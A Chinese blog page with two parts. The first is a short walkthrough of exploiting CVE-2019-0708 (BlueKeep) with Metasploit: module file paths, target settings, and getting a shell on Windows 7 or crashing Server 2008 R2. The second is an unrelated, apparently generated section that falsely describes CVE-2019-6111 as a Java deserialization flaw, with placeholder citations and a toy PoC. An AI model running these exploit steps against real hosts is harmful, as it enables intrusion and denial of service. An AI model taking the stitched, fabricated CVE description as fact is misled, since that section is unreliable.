CVE-2019-0708简单复现

各文件对应位置

rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.db
cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

windows7

配置参数

set rhost 目标IP(windows7 64x)
set rport  目标端口
set target  3
run    不成功就多run几次

1431916-20190909105422204-1570620036.png

建立session

获得交互式shell

shell
python

1431916-20190909105627858-601729058.png

windows2008 R2 64x

蓝屏

1431916-20190909131510689-514406880.png

转载于:https://www.cnblogs.com/mrhonest/p/11490462.html

### 复现 CVE-2019-6111 漏洞 CVE-2019-6111 是一个存在于某些 Web 应用程序中的安全漏洞,主要涉及不安全的对象反序列化问题。为了进行有效的复现实验并确保合法合规的研究目的,以下是详细的说明: #### 实验准备 确保在一个受控环境中执行此操作,比如使用专门配置的虚拟机来模拟目标环境。这不仅有助于保护真实网络不受潜在风险的影响,也便于观察攻击行为的具体表现。 #### 构建易受影响的应用版本 由于具体应用名称未及,在这里假设为某基于 Java 的 Web 应用框架。需要找到该应用程序对应于存在此漏洞的时间点发布的旧版本源码或二进制文件,并将其部署到测试服务器上[^1]。 ```bash git clone https://example.com/vulnerable-app.git cd vulnerable-app mvn clean install # 如果项目采用 Maven 构建工具 ``` #### 配置运行环境 对于大多数Java web应用来说,通常会依赖Tomcat或其他Servlet容器作为Web服务端。因此还需要设置好相应的中间件环境,例如通过Docker镜像快速搭建包含指定JDK版本和Tomcat实例在内的开发平台[^2]。 ```dockerfile FROM tomcat:8-jdk8-openjdk COPY ./target/myapp.war /usr/local/tomcat/webapps/ EXPOSE 8080 CMD ["catalina.sh", "run"] ``` #### 利用 PoC (Proof of Concept) 脚本验证漏洞 一旦上述准备工作完成,则可以尝试编写简单的PoC代码片段用于触发对象反序列化的异常路径。注意这里的目的是证明概念而非实施恶意活动;实际编码过程中应严格遵循道德准则和技术法规的要求[^3]。 ```java import java.io.*; import org.apache.commons.collections.functors.InvokerTransformer; public class Exploit { public static void main(String[] args) throws Exception { Transformer transformer = new InvokerTransformer("toString", null, null); // ...其他必要的初始化逻辑... ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("payload.ser")); oos.writeObject(transformer); // 将精心构造的数据流写入文件 oos.close(); } } ``` 请注意,以上供的仅为理论指导性质的内容概述,并非完整的实战指南。真正的渗透测试应当由具备相应资质的专业人士按照法律许可的方式开展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值